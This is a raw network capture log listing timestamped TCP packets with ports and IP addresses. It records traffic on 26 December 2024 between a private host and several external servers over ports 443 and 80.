Dec 26, 2024 12:41:29.379620075 CET	49755	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:29.398113012 CET	49755	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:29.398149967 CET	443	49755	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:29.398822069 CET	443	49755	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:29.413671970 CET	49755	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:29.413764954 CET	49755	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:29.413784981 CET	443	49755	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:30.160331964 CET	443	49755	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:30.160427094 CET	443	49755	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:30.160514116 CET	49755	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:30.160598993 CET	49755	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:30.160618067 CET	443	49755	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:30.671075106 CET	49763	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:30.671130896 CET	443	49763	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:30.671189070 CET	49763	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:30.671539068 CET	49763	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:30.671562910 CET	443	49763	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:31.974904060 CET	443	49763	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:31.974972010 CET	49763	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:31.987322092 CET	49763	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:31.987337112 CET	443	49763	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:31.987561941 CET	443	49763	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:31.989339113 CET	49763	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:31.990870953 CET	49763	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:31.990910053 CET	443	49763	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:31.991173983 CET	49763	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:31.991206884 CET	443	49763	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:31.991605997 CET	49763	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:31.991637945 CET	443	49763	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:31.992017031 CET	49763	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:31.992043972 CET	443	49763	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:31.992182970 CET	49763	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:31.992221117 CET	443	49763	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:31.992722988 CET	49763	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:31.992748976 CET	443	49763	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:31.992762089 CET	49763	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:31.992774010 CET	443	49763	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:31.992886066 CET	49763	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:31.992906094 CET	443	49763	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:31.992924929 CET	49763	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:31.993057966 CET	49763	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:31.993077993 CET	49763	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:32.039329052 CET	443	49763	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:32.039486885 CET	49763	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:32.039509058 CET	443	49763	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:32.039529085 CET	49763	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:32.039545059 CET	443	49763	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:32.039561033 CET	49763	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:32.039572954 CET	443	49763	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:32.039648056 CET	49763	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:32.039665937 CET	443	49763	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:34.512061119 CET	49776	443	192.168.2.6	20.198.119.84
Dec 26, 2024 12:41:34.512119055 CET	443	49776	20.198.119.84	192.168.2.6
Dec 26, 2024 12:41:34.512207985 CET	49776	443	192.168.2.6	20.198.119.84
Dec 26, 2024 12:41:34.512772083 CET	49776	443	192.168.2.6	20.198.119.84
Dec 26, 2024 12:41:34.512785912 CET	443	49776	20.198.119.84	192.168.2.6
Dec 26, 2024 12:41:35.841696024 CET	443	49763	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:35.841784000 CET	443	49763	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:35.841845036 CET	49763	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:35.841969013 CET	49763	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:35.841984034 CET	443	49763	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:35.851960897 CET	49777	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:35.851998091 CET	443	49777	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:35.852108002 CET	49777	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:35.852468967 CET	49777	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:35.852483988 CET	443	49777	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:36.831988096 CET	443	49776	20.198.119.84	192.168.2.6
Dec 26, 2024 12:41:36.832104921 CET	49776	443	192.168.2.6	20.198.119.84
Dec 26, 2024 12:41:36.836153030 CET	49776	443	192.168.2.6	20.198.119.84
Dec 26, 2024 12:41:36.836164951 CET	443	49776	20.198.119.84	192.168.2.6
Dec 26, 2024 12:41:36.836409092 CET	443	49776	20.198.119.84	192.168.2.6
Dec 26, 2024 12:41:36.838042021 CET	49776	443	192.168.2.6	20.198.119.84
Dec 26, 2024 12:41:36.838094950 CET	49776	443	192.168.2.6	20.198.119.84
Dec 26, 2024 12:41:36.838100910 CET	443	49776	20.198.119.84	192.168.2.6
Dec 26, 2024 12:41:36.838223934 CET	49776	443	192.168.2.6	20.198.119.84
Dec 26, 2024 12:41:36.883341074 CET	443	49776	20.198.119.84	192.168.2.6
Dec 26, 2024 12:41:37.155692101 CET	443	49777	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:37.155819893 CET	49777	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:37.157380104 CET	49777	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:37.157396078 CET	443	49777	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:37.157641888 CET	443	49777	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:37.166548014 CET	49777	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:37.166548014 CET	49777	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:37.166637897 CET	443	49777	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:37.398364067 CET	443	49776	20.198.119.84	192.168.2.6
Dec 26, 2024 12:41:37.398442984 CET	443	49776	20.198.119.84	192.168.2.6
Dec 26, 2024 12:41:37.398650885 CET	49776	443	192.168.2.6	20.198.119.84
Dec 26, 2024 12:41:37.400552988 CET	49776	443	192.168.2.6	20.198.119.84
Dec 26, 2024 12:41:37.400572062 CET	443	49776	20.198.119.84	192.168.2.6
Dec 26, 2024 12:41:37.922401905 CET	443	49777	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:37.922492027 CET	443	49777	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:37.922543049 CET	49777	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:37.927613974 CET	49777	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:37.927613974 CET	49777	443	192.168.2.6	104.21.11.101
Dec 26, 2024 12:41:37.927634954 CET	443	49777	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:37.927644968 CET	443	49777	104.21.11.101	192.168.2.6
Dec 26, 2024 12:41:38.650903940 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:38.770418882 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:38.770492077 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:38.770641088 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:38.890342951 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.193350077 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.193455935 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.193470001 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.193483114 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.193515062 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.193527937 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.193540096 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:40.193542004 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.193579912 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:40.193766117 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.193810940 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:40.193836927 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.193850040 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.193885088 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:40.313088894 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.313132048 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.313214064 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:40.403762102 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.403898001 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.407095909 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:40.407881975 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.408030987 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.408085108 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:40.416361094 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.416562080 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.416601896 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:40.424905062 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.424956083 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.425007105 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:40.433083057 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.433098078 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.433173895 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:40.441450119 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.441570997 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.441632986 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:40.449799061 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.449924946 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.450251102 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:40.458172083 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.458318949 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.458380938 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:40.466717958 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.466870070 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.466913939 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:40.475064993 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.475078106 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.475147009 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:40.483350039 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.483361959 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.483411074 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:40.614425898 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.614542007 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.614661932 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:40.617100954 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.617223024 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.617292881 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:40.622531891 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.622653961 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.622720003 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:40.627974987 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.628103018 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.628190041 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:40.633301973 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.633395910 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.633450985 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:40.638775110 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.638804913 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.638874054 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:40.644440889 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.644608021 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.644674063 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:40.649888992 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.649902105 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.649991989 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:40.655246973 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.655421019 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.655483007 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:40.660753965 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.660892963 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.660979986 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:40.666174889 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.666333914 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.666388988 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:40.671331882 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.671410084 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.671494961 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:40.676630020 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.676697969 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.676760912 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:40.683001995 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.683041096 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.683141947 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:40.687752962 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.687903881 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.687973022 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:40.693335056 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.693348885 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.693430901 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:40.698649883 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.698795080 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.699069977 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:40.704180002 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.704193115 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.704262972 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:40.709408998 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.709574938 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.709628105 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:40.824753046 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.824826956 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.824958086 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:40.826831102 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.826997042 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.827091932 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:40.830955982 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.832707882 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.832777977 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:40.832855940 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.836463928 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.836556911 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:40.836560965 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.840615034 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.840641022 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.840672016 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:40.844474077 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.844535112 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:40.844615936 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.848455906 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.848553896 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:40.848556042 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.852516890 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.852547884 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.852586985 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:40.856359959 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.856427908 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:40.856467962 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.860353947 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.860430956 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.860461950 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:40.864202976 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.864265919 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:40.864322901 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.868180990 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.868247032 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:40.868280888 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.872168064 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.872179985 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.872265100 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:40.876122952 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.876192093 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:40.876230001 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.880171061 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.880266905 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:40.880322933 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.884103060 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.884113073 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.884193897 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:40.888047934 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.888102055 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.888125896 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:40.891930103 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.892002106 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:40.892039061 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.896043062 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.896055937 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.896125078 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:40.899878025 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.899955034 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:40.900103092 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.903830051 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.903891087 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:40.903940916 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.907819986 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.907900095 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.907902956 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:40.911710024 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.911761045 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:40.911811113 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.915741920 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.915805101 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:40.915868044 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.919683933 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.919739962 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.919771910 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:40.923646927 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.923715115 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:40.923749924 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.927838087 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.927896023 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.927905083 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:40.931602955 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.931616068 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.931691885 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:40.935559988 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.935622931 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:40.935678959 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.939486027 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.939573050 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:40.939611912 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.943375111 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:40.943432093 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.035360098 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.035376072 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.035470009 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.036782980 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.037326097 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.037383080 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.037441969 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.040419102 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.040465117 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.040532112 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.043476105 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.043528080 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.043592930 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.046658039 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.046703100 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.046710014 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.049452066 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.049504042 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.049531937 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.052356005 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.052402973 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.052531958 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.055250883 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.055355072 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.055447102 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.058057070 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.058111906 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.058168888 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.060798883 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.060861111 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.060925961 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.063604116 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.063626051 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.063689947 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.066308975 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.066322088 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.066370964 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.068928957 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.068983078 CET	49784	80	192.168.2.6	185.215.113.16
